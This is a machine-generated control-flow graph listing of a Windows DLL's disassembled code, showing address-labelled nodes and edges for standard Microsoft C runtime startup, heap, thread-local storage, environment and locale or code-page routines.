1000a248 InterlockedDecrement 10695->10696 10697 1000a24b 10695->10697 10696->10697 10698 1000a255 InterlockedDecrement 10697->10698 10699 1000a258 10697->10699 10698->10699 10700 1000a262 InterlockedDecrement 10699->10700 10702 1000a265 10699->10702 10700->10702 10701 1000a27e InterlockedDecrement 10701->10702 10702->10701 10703 1000a28e InterlockedDecrement 10702->10703 10704 1000a299 InterlockedDecrement 10702->10704 10703->10702 10704->10693 10706 1000a0c1 10705->10706 10707 1000a054 10705->10707 10708 1000a10e 10706->10708 10709 100088c4 __setlocale_set_cat 69 API calls 10706->10709 10707->10706 10713 1000a088 10707->10713 10719 100088c4 __setlocale_set_cat 69 API calls 10707->10719 10726 1000a135 10708->10726 10759 10010e17 10708->10759 10711 1000a0e2 10709->10711 10715 100088c4 __setlocale_set_cat 69 API calls 10711->10715 10714 1000a0a9 10713->10714 10721 100088c4 __setlocale_set_cat 69 API calls 10713->10721 10717 100088c4 __setlocale_set_cat 69 API calls 10714->10717 10716 1000a0f5 10715->10716 10722 100088c4 __setlocale_set_cat 69 API calls 10716->10722 10723 1000a0b6 10717->10723 10718 1000a17a 10724 100088c4 __setlocale_set_cat 69 API calls 10718->10724 10725 1000a07d 10719->10725 10720 100088c4 __setlocale_set_cat 69 API calls 10720->10726 10727 1000a09e 10721->10727 10728 1000a103 10722->10728 10730 100088c4 __setlocale_set_cat 69 API calls 10723->10730 10731 1000a180 10724->10731 10735 10011234 10725->10735 10726->10718 10729 100088c4 69 API calls __setlocale_set_cat 10726->10729 10751 10011025 10727->10751 10734 100088c4 __setlocale_set_cat 69 API calls 10728->10734 10729->10726 10730->10706 10731->10682 10734->10708 10736 10011241 10735->10736 10750 100112be 10735->10750 10737 10011252 10736->10737 10738 100088c4 __setlocale_set_cat 69 API calls 10736->10738 10739 10011264 10737->10739 10740 100088c4 __setlocale_set_cat 69 API calls 10737->10740 10738->10737 10741 10011276 10739->10741 10742 100088c4 __setlocale_set_cat 69 API calls 10739->10742 10740->10739 10743 10011288 10741->10743 10745 100088c4 __setlocale_set_cat 69 API calls 10741->10745 10742->10741 10744 1001129a 10743->10744 10746 100088c4 __setlocale_set_cat 69 API calls 10743->10746 10747 100112ac 10744->10747 10748 100088c4 __setlocale_set_cat 69 API calls 10744->10748 10745->10743 10746->10744 10749 100088c4 __setlocale_set_cat 69 API calls 10747->10749 10747->10750 10748->10747 10749->10750 10750->10713 10752 10011032 10751->10752 10753 10011066 10751->10753 10754 10011042 10752->10754 10755 100088c4 __setlocale_set_cat 69 API calls 10752->10755 10753->10714 10756 10011054 10754->10756 10757 100088c4 __setlocale_set_cat 69 API calls 10754->10757 10755->10754 10756->10753 10758 100088c4 __setlocale_set_cat 69 API calls 10756->10758 10757->10756 10758->10753 10760 10010e28 10759->10760 10846 1000a12e 10759->10846 10761 100088c4 __setlocale_set_cat 69 API calls 10760->10761 10762 10010e30 10761->10762 10763 100088c4 __setlocale_set_cat 69 API calls 10762->10763 10764 10010e38 10763->10764 10765 100088c4 __setlocale_set_cat 69 API calls 10764->10765 10766 10010e40 10765->10766 10767 100088c4 __setlocale_set_cat 69 API calls 10766->10767 10768 10010e48 10767->10768 10769 100088c4 __setlocale_set_cat 69 API calls 10768->10769 10770 10010e50 10769->10770 10771 100088c4 __setlocale_set_cat 69 API calls 10770->10771 10772 10010e58 10771->10772 10773 100088c4 __setlocale_set_cat 69 API calls 10772->10773 10774 10010e5f 10773->10774 10775 100088c4 __setlocale_set_cat 69 API calls 10774->10775 10776 10010e67 10775->10776 10777 100088c4 __setlocale_set_cat 69 API calls 10776->10777 10778 10010e6f 10777->10778 10779 100088c4 __setlocale_set_cat 69 API calls 10778->10779 10780 10010e77 10779->10780 10781 100088c4 __setlocale_set_cat 69 API calls 10780->10781 10782 10010e7f 10781->10782 10783 100088c4 __setlocale_set_cat 69 API calls 10782->10783 10784 10010e87 10783->10784 10785 100088c4 __setlocale_set_cat 69 API calls 10784->10785 10786 10010e8f 10785->10786 10787 100088c4 __setlocale_set_cat 69 API calls 10786->10787 10788 10010e97 10787->10788 10789 100088c4 __setlocale_set_cat 69 API calls 10788->10789 10790 10010e9f 10789->10790 10791 100088c4 __setlocale_set_cat 69 API calls 10790->10791 10792 10010ea7 10791->10792 10793 100088c4 __setlocale_set_cat 69 API calls 10792->10793 10794 10010eb2 10793->10794 10795 100088c4 __setlocale_set_cat 69 API calls 10794->10795 10796 10010eba 10795->10796 10797 100088c4 __setlocale_set_cat 69 API calls 10796->10797 10798 10010ec2 10797->10798 10799 100088c4 __setlocale_set_cat 69 API calls 10798->10799 10800 10010eca 10799->10800 10801 100088c4 __setlocale_set_cat 69 API calls 10800->10801 10802 10010ed2 10801->10802 10803 100088c4 __setlocale_set_cat 69 API calls 10802->10803 10804 10010eda 10803->10804 10805 100088c4 __setlocale_set_cat 69 API calls 10804->10805 10806 10010ee2 10805->10806 10807 100088c4 __setlocale_set_cat 69 API calls 10806->10807 10808 10010eea 10807->10808 10809 100088c4 __setlocale_set_cat 69 API calls 10808->10809 10810 10010ef2 10809->10810 10811 100088c4 __setlocale_set_cat 69 API calls 10810->10811 10812 10010efa 10811->10812 10813 100088c4 __setlocale_set_cat 69 API calls 10812->10813 10814 10010f02 10813->10814 10815 100088c4 __setlocale_set_cat 69 API calls 10814->10815 10816 10010f0a 10815->10816 10817 100088c4 __setlocale_set_cat 69 API calls 10816->10817 10818 10010f12 10817->10818 10819 100088c4 __setlocale_set_cat 69 API calls 10818->10819 10820 10010f1a 10819->10820 10821 100088c4 __setlocale_set_cat 69 API calls 10820->10821 10822 10010f22 10821->10822 10823 100088c4 __setlocale_set_cat 69 API calls 10822->10823 10824 10010f2a 10823->10824 10825 100088c4 __setlocale_set_cat 69 API calls 10824->10825 10826 10010f38 10825->10826 10827 100088c4 __setlocale_set_cat 69 API calls 10826->10827 10828 10010f43 10827->10828 10829 100088c4 __setlocale_set_cat 69 API calls 10828->10829 10830 10010f4e 10829->10830 10831 100088c4 __setlocale_set_cat 69 API calls 10830->10831 10832 10010f59 10831->10832 10833 100088c4 __setlocale_set_cat 69 API calls 10832->10833 10834 10010f64 10833->10834 10835 100088c4 __setlocale_set_cat 69 API calls 10834->10835 10836 10010f6f 10835->10836 10837 100088c4 __setlocale_set_cat 69 API calls 10836->10837 10838 10010f7a 10837->10838 10839 100088c4 __setlocale_set_cat 69 API calls 10838->10839 10840 10010f85 10839->10840 10841 100088c4 __setlocale_set_cat 69 API calls 10840->10841 10842 10010f90 10841->10842 10843 100088c4 __setlocale_set_cat 69 API calls 10842->10843 10844 10010f9b 10843->10844 10845 100088c4 __setlocale_set_cat 69 API calls 10844->10845 10845->10846 10846->10720 10847->10690 10851 1000b962 LeaveCriticalSection 10848->10851 10850 1000fbe5 10850->10668 10851->10850 10853 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 10852->10853 10854 10010246 10853->10854 10855 1001046f 10854->10855 10856 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 10855->10856 10857 10010482 10856->10857 10860 100102b5 10857->10860 10861 10010301 10860->10861 10862 100102d6 GetStringTypeW 10860->10862 10863 100103e8 10861->10863 10865 100102ee 10861->10865 10864 100102f6 GetLastError 10862->10864 10862->10865 10888 10010000 GetLocaleInfoA 10863->10888 10864->10861 10866 1001033a MultiByteToWideChar 10865->10866 10883 100103e2 10865->10883 10872 10010367 10866->10872 10866->10883 10868 10007528 __setlocale_set_cat 5 API calls 10870 1001046d 10868->10870 10870->10640 10871 10010439 GetStringTypeA 10876 10010454 10871->10876 10871->10883 10873 10007586 _malloc 69 API calls 10872->10873 10877 1001037c _memset __alloca_probe_16 10872->10877 10873->10877 10875 100103b5 MultiByteToWideChar 10879 100103cb GetStringTypeW 10875->10879 10880 100103dc 10875->10880 10881 100088c4 __setlocale_set_cat 69 API calls 10876->10881 10877->10875 10877->10883 10879->10880 10884 10007671 10880->10884 10881->10883 10883->10868 10885 1000767d 10884->10885 10886 1000768e 10884->10886 10885->10886 10887 100088c4 __setlocale_set_cat 69 API calls 10885->10887 10886->10883 10887->10886 10889 10010033 10888->10889 10892 1001002e 10888->10892 10919 10007650 10889->10919 10891 10007528 __setlocale_set_cat 5 API calls 10893 10010047 10891->10893 10892->10891 10893->10871 10893->10883 10894 10010049 10893->10894 10895 10010089 GetCPInfo 10894->10895 10899 10010113 10894->10899 10896 100100a0 10895->10896 10897 100100fe MultiByteToWideChar 10895->10897 10896->10897 10900 100100a6 GetCPInfo 10896->10900 10897->10899 10903 100100b9 _strlen 10897->10903 10898 10007528 __setlocale_set_cat 5 API calls 10901 100101fb 10898->10901 10899->10898 10900->10897 10902 100100b3 10900->10902 10901->10871 10901->10883 10902->10897 10902->10903 10904 10007586 _malloc 69 API calls 10903->10904 10906 100100eb _memset __alloca_probe_16 10903->10906 10904->10906 10905 10010148 MultiByteToWideChar 10907 10010160 10905->10907 10908 1001017f 10905->10908 10906->10899 10906->10905 10910 10010184 10907->10910 10911 10010167 WideCharToMultiByte 10907->10911 10909 10007671 __crtLCMapStringA_stat 69 API calls 10908->10909 10909->10899 10912 100101a3 10910->10912 10913 1001018f WideCharToMultiByte 10910->10913 10911->10908 10914 10009e8c __calloc_crt 69 API calls 10912->10914 10913->10908 10913->10912 10915 100101ab 10914->10915 10915->10908 10916 100101b4 WideCharToMultiByte 10915->10916 10916->10908 10917 100101c6 10916->10917 10918 100088c4 __setlocale_set_cat 69 API calls 10917->10918 10918->10908 10920 1000db09 __wcstoi64 93 API calls 10919->10920 10921->10026 10923 10007a75 10924 10007a80 10923->10924 10925 10007a85 10923->10925 10937 1000e372 10924->10937 10929 1000797f 10925->10929 10928 10007a93 10930 1000798b _flsall 10929->10930 10934 100079d8 ___DllMainCRTStartup 10930->10934 10935 10007a28 _flsall 10930->10935 10941 1000784a 10930->10941 10932 10007a08 10933 1000784a __CRT_INIT@12 156 API calls 10932->10933 10932->10935 10933->10935 10934->10932 10934->10935 10936 1000784a __CRT_INIT@12 156 API calls 10934->10936 10935->10928 10936->10932 10938 1000e3a4 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 10937->10938 10939 1000e397 10937->10939 10940 1000e39b 10938->10940 10939->10938 10939->10940 10940->10925 10942 100078d5 10941->10942 10943 10007859 10941->10943 10945 100078db 10942->10945 10946 1000790c 10942->10946 10990 1000d836 HeapCreate 10943->10990 10955 100078f6 10945->10955 10964 10007864 10945->10964 11081 1000b863 10945->11081 10947 10007911 10946->10947 10948 1000796a 10946->10948 10950 1000c212 ___set_flsgetvalue 9 API calls 10947->10950 10948->10964 11118 1000c52c 10948->11118 10951 10007916 10950->10951 10957 10009e8c __calloc_crt 69 API calls 10951->10957 10956 1000b4c0 __ioterm 70 API calls 10955->10956 10955->10964 10959 10007900 10956->10959 10960 10007922 10957->10960 10958 10007870 __RTC_Initialize 10961 10007874 10958->10961 10966 10007880 GetCommandLineA 10958->10966 10963 1000c246 __mtterm 8 API calls 10959->10963 10960->10964 10967 1000c197 __decode_pointer 7 API calls 10960->10967 11084 1000d866 10961->11084 10965 10007905 10963->10965 10964->10934 10968 1000d866 __heap_term 4 API calls 10965->10968 11026 1000e068 10966->11026 10970 10007940 10967->10970 10968->10964 10973 10007947 10970->10973 10974 1000795e 10970->10974 10976 1000c283 __initptd 69 API calls 10973->10976 10977 100088c4 __setlocale_set_cat 69 API calls 10974->10977 10975 1000789a 10978 1000789e 10975->10978 11096 1000dfad 10975->11096 10979 1000794e GetCurrentThreadId 10976->10979 10977->10964 11090 1000c246 10978->11090 10979->10964 10982 100078aa 10983 100078be 10982->10983 11066 1000dd35 10982->11066 10989 100078c3 10983->10989 11113 1000b4c0 10983->11113 10989->10964 10991 1000785f 10990->10991 10991->10964 10992 1000c59a GetModuleHandleW 10991->10992 10993 1000c5b5 10992->10993 10994 1000c5ae 10992->10994 10996 1000c71d 10993->10996 10997 1000c5bf GetProcAddress GetProcAddress GetProcAddress GetProcAddress 10993->10997 10995 1000b5ad __crt_waiting_on_module_handle 2 API calls 10994->10995 10999 1000c5b4 10995->10999 10998 1000c246 __mtterm 8 API calls 10996->10998 11000 1000c608 TlsAlloc 10997->11000 11002 1000c722 10998->11002 10999->10993 11000->11002 11003 1000c656 TlsSetValue 11000->11003 11002->10958 11003->11002 11004 1000c667 11003->11004 11129 1000b872 11004->11129 11007 1000c11c __encode_pointer 7 API calls 11008 1000c677 11007->11008 11009 1000c11c __encode_pointer 7 API calls 11008->11009 11010 1000c687 11009->11010 11011 1000c11c __encode_pointer 7 API calls 11010->11011 11012 1000c697 11011->11012 11013 1000c11c __encode_pointer 7 API calls 11012->11013 11014 1000c6a7 11013->11014 11136 1000b8c0 11014->11136 11017 1000c197 __decode_pointer 7 API calls 11018 1000c6c8 11017->11018 11018->10996 11019 10009e8c __calloc_crt 69 API calls 11018->11019 11020 1000c6e1 11019->11020 11020->10996 11021 1000c197 __decode_pointer 7 API calls 11020->11021 11022 1000c6fb 11021->11022 11022->10996 11023 1000c702 11022->11023 11024 1000c283 __initptd 69 API calls 11023->11024 11025 1000c70a GetCurrentThreadId 11024->11025 11025->11002 11027 1000e086 GetEnvironmentStringsW 11026->11027 11031 1000e0a5 11026->11031 11028 1000e09a GetLastError 11027->11028 11029 1000e08e 11027->11029 11028->11031 11032 1000e0d0 WideCharToMultiByte 11029->11032 11033 1000e0c1 GetEnvironmentStringsW 11029->11033 11030 1000e13e 11034 1000e147 GetEnvironmentStrings 11030->11034 11035 10007890 11030->11035 11031->11029 11031->11030 11038 1000e133 FreeEnvironmentStringsW 11032->11038 11039 1000e104 11032->11039 11033->11032 11033->11035 11034->11035 11036 1000e157 11034->11036 11051 1000b26c 11035->11051 11040 10009e47 __malloc_crt 69 API calls 11036->11040 11038->11035 11148 10009e47 11039->11148 11042 1000e171 11040->11042 11044 1000e184 __setlocale_set_cat 11042->11044 11045 1000e178 FreeEnvironmentStringsA 11042->11045 11049 1000e18e FreeEnvironmentStringsA 11044->11049 11045->11035 11046 1000e112 WideCharToMultiByte 11047 1000e12c 11046->11047 11048 1000e124 11046->11048 11047->11038 11050 100088c4 __setlocale_set_cat 69 API calls 11048->11050 11049->11035 11050->11047 11154 1000b078 11051->11154 11053 1000b278 GetStartupInfoA 11054 10009e8c __calloc_crt 69 API calls 11053->11054 11061 1000b299 11054->11061 11055 1000b4b7 _flsall 11055->10975 11056 1000b434 GetStdHandle 11065 1000b3fe 11056->11065 11057 10009e8c __calloc_crt 69 API calls 11057->11061 11058 1000b499 SetHandleCount 11058->11055 11059 1000b446 GetFileType 11059->11065 11060 1000b381 11060->11055 11062 1000b3aa GetFileType 11060->11062 11064 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 11060->11064 11060->11065 11061->11055 11061->11057 11061->11060 11061->11065 11062->11060 11063 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 11063->11065 11064->11060 11065->11055 11065->11056 11065->11058 11065->11059 11065->11063 11067 1000dd3e 11066->11067 11069 1000dd43 _strlen 11066->11069 11155 1000ffe2 11067->11155 11070 10009e8c __calloc_crt 69 API calls 11069->11070 11073 100078b3 11069->11073 11076 1000dd78 _strlen 11070->11076 11071 1000ddd6 11072 100088c4 __setlocale_set_cat 69 API calls 11071->11072 11072->11073 11073->10983 11107 1000b69c 11073->11107 11074 10009e8c __calloc_crt 69 API calls 11074->11076 11075 1000ddfc 11077 100088c4 __setlocale_set_cat 69 API calls 11075->11077 11076->11071 11076->11073 11076->11074 11076->11075 11078 1000bdd5 _strcpy_s 69 API calls 11076->11078 11079 1000ddbd 11076->11079 11077->11073 11078->11076 11079->11076 11080 10006f64 __invoke_watson 10 API calls 11079->11080 11080->11079 11273 1000b721 11081->11273 11083 1000b86e 11083->10955 11085 1000d8c6 HeapDestroy 11084->11085 11086 1000d86f 11084->11086 11085->10964 11087 1000d8b4 HeapFree 11086->11087 11088 1000d88b VirtualFree HeapFree 11086->11088 11087->11085 11088->11088 11089 1000d8b3 11088->11089 11089->11087 11091 1000c250 11090->11091 11092 1000c25c 11090->11092 11093 1000c197 __decode_pointer 7 API calls 11091->11093 11094 1000c270 TlsFree 11092->11094 11095 1000c27e 11092->11095 11093->11092 11094->11095 11095->11095 11097 1000dfc2 11096->11097 11098 1000dfc7 GetModuleFileNameA 11096->11098 11099 1000ffe2 ___initmbctable 113 API calls 11097->11099 11100 1000dfee 11098->11100 11099->11098 11298 1000de13 11100->11298 11102 1000e04a 11102->10982 11104 10009e47 __malloc_crt 69 API calls 11105 1000e030 11104->11105 11105->11102 11106 1000de13 _parse_cmdline 79 API calls 11105->11106 11106->11102 11108 1000b6aa __IsNonwritableInCurrentImage 11107->11108 11310 10013694 11108->11310 11110 1000b6c8 __initterm_e 11111 100077b8 __cinit 76 API calls 11110->11111 11112 1000b6e7 __IsNonwritableInCurrentImage __initterm 11110->11112 11111->11112 11112->10983 11115 1000b4c9 11113->11115 11114 100078d3 11114->10978 11115->11114 11116 1000b4dd DeleteCriticalSection 11115->11116 11117 100088c4 __setlocale_set_cat 69 API calls 11115->11117 11116->11115 11117->11115 11119 1000c585 11118->11119 11120 1000c53a 11118->11120 11122 1000c598 11119->11122 11123 1000c58f TlsSetValue 11119->11123 11121 1000c540 TlsGetValue 11120->11121 11125 1000c563 11120->11125 11124 1000c553 TlsGetValue 11121->11124 11121->11125 11122->10964 11123->11122 11124->11125 11126 1000c197 __decode_pointer 7 API calls 11125->11126 11127 1000c57a 11126->11127 11314 1000c3fd 11127->11314 11130 1000c18e __init_pointers 7 API calls 11129->11130 11131 1000b87a __init_pointers __initp_misc_winsig 11130->11131 11140 1000cc0b 11131->11140 11134 1000c11c __encode_pointer 7 API calls 11135 1000b8b6 11134->11135 11135->11007 11137 1000b8cb 11136->11137 11139 1000b8f9 11137->11139 11143 10013b8c 11137->11143 11139->10996 11139->11017 11141 1000c11c __encode_pointer 7 API calls 11140->11141 11142 1000b8ac 11141->11142 11142->11134 11147 1000b078 11143->11147 11145 10013b98 InitializeCriticalSectionAndSpinCount 11146 10013bdc _flsall 11145->11146 11146->11137 11147->11145 11151 10009e50 11148->11151 11149 10007586 _malloc 68 API calls 11149->11151 11150 10009e86 11150->11038 11150->11046 11151->11149 11151->11150 11152 10009e67 Sleep 11151->11152 11153 10009e7c 11152->11153 11153->11150 11153->11151 11154->11053 11156 1000ffeb 11155->11156 11157 1000fff2 11155->11157 11159 1000fe48 11156->11159 11157->11069 11160 1000fe54 _flsall 11159->11160 11161 1000c3e3 __getptd 69 API calls 11160->11161 11162 1000fe5d 11161->11162 11163 1000fb43 _LocaleUpdate::_LocaleUpdate 71 API calls 11162->11163 11164 1000fe67 11163->11164 11190 1000fbe7 11164->11190 11167 10009e47 __malloc_crt 69 API calls 11168 1000fe88 11167->11168 11169 1000ffa7 _flsall 11168->11169 11197 1000fc63 11168->11197 11169->11157 11172 1000ffb4 11172->11169 11177 1000ffc7 11172->11177 11178 100088c4 __setlocale_set_cat 69 API calls 11172->11178 11173 1000feb8 InterlockedDecrement 11174 1000fec8 11173->11174 11175 1000fed9 InterlockedIncrement 11173->11175 11174->11175 11180 100088c4 __setlocale_set_cat 69 API calls 11174->11180 11175->11169 11176 1000feef 11175->11176 11176->11169 11182 1000ba3c __lock 69 API calls 11176->11182 11179 1000b02e _fputc 69 API calls 11177->11179 11178->11177 11179->11169 11181 1000fed8 11180->11181 11181->11175 11184 1000ff03 InterlockedDecrement 11182->11184 11185 1000ff92 InterlockedIncrement 11184->11185 11186 1000ff7f 11184->11186 11207 1000ffa9 11185->11207 11186->11185 11188 100088c4 __setlocale_set_cat 69 API calls 11186->11188 11189 1000ff91 11188->11189 11189->11185 11191 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11190->11191 11192 1000fbfb 11191->11192 11193 1000fc24 11192->11193 11194 1000fc06 GetOEMCP 11192->11194 11195 1000fc29 GetACP 11193->11195 11196 1000fc16 11193->11196 11194->11196 11195->11196 11196->11167 11196->11169 11198 1000fbe7 getSystemCP 81 API calls 11197->11198 11199 1000fc83 11198->11199 11200 1000fc8e setSBCS 11199->11200 11203 1000fcd2 IsValidCodePage 11199->11203 11206 1000fcf7 _memset __setmbcp_nolock 11199->11206 11201 10007528 __setlocale_set_cat 5 API calls 11200->11201 11202 1000fe46 11201->11202 11202->11172 11202->11173 11203->11200 11204 1000fce4 GetCPInfo 11203->11204 11204->11200 11204->11206 11210 1000f9b0 GetCPInfo 11206->11210 11272 1000b962 LeaveCriticalSection 11207->11272 11209 1000ffb0 11209->11169 11211 1000fa96 11210->11211 11214 1000f9e4 _memset 11210->11214 11216 10007528 __setlocale_set_cat 5 API calls 11211->11216 11212 1001046f ___crtGetStringTypeA 93 API calls 11213 1000fa51 11212->11213 11220 1000986e 11213->11220 11214->11212 11218 1000fb41 11216->11218 11218->11206 11219 1000986e ___crtLCMapStringA 104 API calls 11219->11211 11221 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11220->11221 11222 10009881 11221->11222 11225 100094c9 11222->11225 11226 100094ea LCMapStringW 11225->11226 11230 10009505 11225->11230 11227 1000950d GetLastError 11226->11227 11226->11230 11227->11230 11228 10009703 11232 10010000 ___ansicp 93 API calls 11228->11232 11229 1000955f 11231 10009578 MultiByteToWideChar 11229->11231 11252 100096fa 11229->11252 11230->11228 11230->11229 11240 100095a5 11231->11240 11231->11252 11234 1000972b 11232->11234 11233 10007528 __setlocale_set_cat 5 API calls 11235 1000986c 11233->11235 11236 10009744 11234->11236 11237 1000981f LCMapStringA 11234->11237 11234->11252 11235->11219 11238 10010049 ___convertcp 76 API calls 11236->11238 11271 1000977b 11237->11271 11243 10009756 11238->11243 11239 100095f6 MultiByteToWideChar 11244 1000960f LCMapStringW 11239->11244 11265 100096f1 11239->11265 11242 10007586 _malloc 69 API calls 11240->11242 11249 100095be __alloca_probe_16 11240->11249 11241 10009846 11251 100088c4 __setlocale_set_cat 69 API calls 11241->11251 11241->11252 11242->11249 11246 10009760 LCMapStringA 11243->11246 11243->11252 11248 10009630 11244->11248 11244->11265 11245 100088c4 __setlocale_set_cat 69 API calls 11245->11241 11255 10009782 11246->11255 11246->11271 11247 10007671 __crtLCMapStringA_stat 69 API calls 11247->11252 11250 10009639 11248->11250 11254 10009662 11248->11254 11249->11239 11249->11252 11253 1000964b LCMapStringW 11250->11253 11250->11265 11251->11252 11252->11233 11253->11265 11258 10007586 _malloc 69 API calls 11254->11258 11268 1000967d __alloca_probe_16 11254->11268 11257 10009793 _memset __alloca_probe_16 11255->11257 11259 10007586 _malloc 69 API calls 11255->11259 11256 100096b1 LCMapStringW 11260 100096c9 WideCharToMultiByte 11256->11260 11261 100096eb 11256->11261 11263 100097d1 LCMapStringA 11257->11263 11257->11271 11258->11268 11259->11257 11260->11261 11262 10007671 __crtLCMapStringA_stat 69 API calls 11261->11262 11262->11265 11266 100097f1 11263->11266 11267 100097ed 11263->11267 11265->11247 11269 10010049 ___convertcp 76 API calls 11266->11269 11270 10007671 __crtLCMapStringA_stat 69 API calls 11267->11270 11268->11256 11268->11265 11269->11267 11270->11271 11271->11241 11271->11245 11272->11209 11274 1000b72d _flsall 11273->11274 11275 1000ba3c __lock 69 API calls 11274->11275 11276 1000b734 11275->11276 11278 1000c197 __decode_pointer 7 API calls 11276->11278 11283 1000b7ed __initterm 11276->11283 11280 1000b76b 11278->11280 11280->11283 11285 1000c197 __decode_pointer 7 API calls 11280->11285 11281 1000b847 _flsall 11281->11083 11282 1000b81f 11296 1000b962 LeaveCriticalSection 11282->11296 11292 1000b838 11283->11292 11291 1000b780 11285->11291 11286 1000b82c 11287 1000b631 __mtinitlocknum 3 API calls 11286->11287 11288 1000b835 11287->11288 11288->11281 11289 1000c18e 7 API calls __init_pointers 11289->11291 11290 1000c197 7 API calls __decode_pointer 11290->11291 11291->11283 11291->11289 11291->11290 11293 1000b819 11292->11293 11294 1000b83e 11292->11294 11293->11281 11293->11282 11297 1000b962 LeaveCriticalSection 11294->11297 11296->11286 11297->11293 11300 1000de32 11298->11300 11302 1000de9f 11300->11302 11304 1001421e 11300->11304 11301 1000df9d 11301->11102 11301->11104 11302->11301 11303 1001421e 79 API calls _parse_cmdline 11302->11303 11303->11302 11307 100141cb 11304->11307 11308 10009442 _LocaleUpdate::_LocaleUpdate 79 API calls 11307->11308 11309 100141de 11308->11309 11309->11300 11311 1001369a 11310->11311 11312 1000c11c __encode_pointer 7 API calls 11311->11312 11313 100136b2 11311->11313 11312->11311 11313->11110 11316 1000c409 _flsall 11314->11316 11315 1000c421 11319 1000c42f 11315->11319 11320 100088c4 __setlocale_set_cat 69 API calls 11315->11320 11316->11315 11317 1000c50b _flsall 11316->11317 11318 100088c4 __setlocale_set_cat 69 API calls 11316->11318 11317->11119 11318->11315 11321 1000c43d 11319->11321 11323 100088c4 __setlocale_set_cat 69 API calls 11319->11323 11320->11319 11322 1000c44b 11321->11322 11324 100088c4 __setlocale_set_cat 69 API calls 11321->11324 11325 1000c459 11322->11325 11326 100088c4 __setlocale_set_cat 69 API calls 11322->11326 11323->11321 11324->11322 11327 1000c467 11325->11327 11328 100088c4 __setlocale_set_cat 69 API calls 11325->11328 11326->11325 11329 1000c475 11327->11329 11331 100088c4 __setlocale_set_cat 69 API calls 11327->11331 11328->11327 11330 1000c486 11329->11330 11332 100088c4 __setlocale_set_cat 69 API calls 11329->11332 11333 1000ba3c __lock 69 API calls 11330->11333 11331->11329 11332->11330 11334 1000c48e 11333->11334 11335 1000c49a InterlockedDecrement 11334->11335 11342 1000c4b3 11334->11342 11336 1000c4a5 11335->11336 11335->11342 11339 100088c4 __setlocale_set_cat 69 API calls 11336->11339 11336->11342 11339->11342 11340 1000ba3c __lock 69 API calls 11341 1000c4c7 11340->11341 11343 1000c4f8 11341->11343 11344 1000a215 ___removelocaleref 8 API calls 11341->11344 11350 1000c517 11342->11350 11353 1000c523 11343->11353 11348 1000c4dc 11344->11348 11347 100088c4 __setlocale_set_cat 69 API calls 11347->11317 11348->11343 11349 1000a03d _setlocale 69 API calls 11348->11349 11349->11343 11356 1000b962 LeaveCriticalSection 11350->11356 11352 1000c4c0 11352->11340 11357 1000b962 LeaveCriticalSection 11353->11357 11355 1000c505 11355->11347 11356->11352 11357->11355 12260 10005a95 12261 10005ab7 12260->12261 12269 10005af4 12260->12269 12270 10005664 12261->12270 12274 10005670 __EH_prolog3_GS 12270->12274 12271 10005693 12341 10007bde 12271->12341 12274->12271 12318 1000563a 12274->12318 12276 10004aee 7 API calls ctype 12281 100056a5 12276->12281 12277 100056f4 12278 10001220 std::locale::_Locimp::~_Locimp 69 API calls 12277->12278 12278->12271 12279 10005335 7 API calls ctype 12279->12281 12281->12276 12281->12277 12281->12279 12322 1000910b 12281->12322 12335 1000540e 12281->12335 12319 10005650 std::_Locinfo::_Locinfo 12318->12319 12344 10005460 12319->12344 12321 1000565d 12321->12281 12323 10009117 _flsall 12322->12323 12324 1000914f 12323->12324 12325 1000912f 12323->12325 12327 10009144 _flsall 12323->12327 12360 100067f9 12324->12360 12326 1000b02e _fputc 69 API calls 12325->12326 12329 10009134 12326->12329 12327->12281 12331 1000708c _fputc 7 API calls 12329->12331 12331->12327 12336 10005424 12335->12336 12337 10005429 12335->12337 12338 1000481d std::_String_base::_Xlen 77 API calls 12336->12338 12339 10001470 ctype 77 API calls 12337->12339 12340 1000543d std::_Locinfo::_Locinfo ctype 12337->12340 12338->12337 12339->12340 12340->12281 12342 10007528 __setlocale_set_cat 5 API calls 12341->12342 12343 10007be8 12342->12343 12343->12343 12345 10005471 12344->12345 12346 10005476 12344->12346 12347 1000481d std::_String_base::_Xlen 77 API calls 12345->12347 12350 10001470 12346->12350 12347->12346 12349 10005480 std::_Locinfo::_Locinfo ctype 12349->12321 12351 10001482 12350->12351 12352 1000147d 12350->12352 12354 10001489 12351->12354 12357 100014a2 12351->12357 12353 1000481d std::_String_base::_Xlen 77 API calls 12352->12353 12353->12351 12355 10001300 std::_String_base::_Xlen 77 API calls 12354->12355 12356 10001495 12355->12356 12356->12349 12358 100068d7 _memcpy_s 69 API calls 12357->12358 12359 100014d1 ctype 12357->12359 12358->12359 12359->12349 12361 1000680b 12360->12361 12362 1000682d EnterCriticalSection 12360->12362 12361->12362 12363 10006813 12361->12363 12365 10006823 12362->12365 12364 1000ba3c __lock 69 API calls 12363->12364 12364->12365 12366 10008fa9 12365->12366 12368 10008fbb 12366->12368 12373 10008fdc 12366->12373 12367 10008fc7 12369 1000b02e _fputc 69 API calls 12367->12369 12368->12367 12368->12373 12376 10008ffa __setlocale_set_cat 12368->12376 12370 10008fcc 12369->12370 12371 1000708c _fputc 7 API calls 12370->12371 12371->12373 12378 10009183 12373->12378 12376->12373 12381 10008cc5 12376->12381 12387 1000e545 12376->12387 12393 1000ee57 12376->12393 12418 1000e577 12376->12418 12598 1000686c 12378->12598 12380 1000918b 12380->12327 12382 10008cde 12381->12382 12386 10008d00 12381->12386 12383 1000e545 __fileno 69 API calls 12382->12383 12382->12386 12384 10008cf9 12383->12384 12385 1000ee57 __locking 103 API calls 12384->12385 12385->12386 12386->12376 12388 1000e569 12387->12388 12389 1000e554 12387->12389 12388->12376 12390 1000b02e _fputc 69 API calls 12389->12390 12391 1000e559 12390->12391 12392 1000708c _fputc 7 API calls 12391->12392 12392->12388 12394 1000ee63 _flsall 12393->12394 12395 1000ee86 12394->12395 12396 1000ee6b 12394->12396 12398 1000ee94 12395->12398 12402 1000eed5 12395->12402 12439 1000b041 12396->12439 12400 1000b041 __locking 69 API calls 12398->12400 12401 1000ee99 12400->12401 12404 1000b02e _fputc 69 API calls 12401->12404 12442 10014b90 12402->12442 12403 1000b02e _fputc 69 API calls 12406 1000ee78 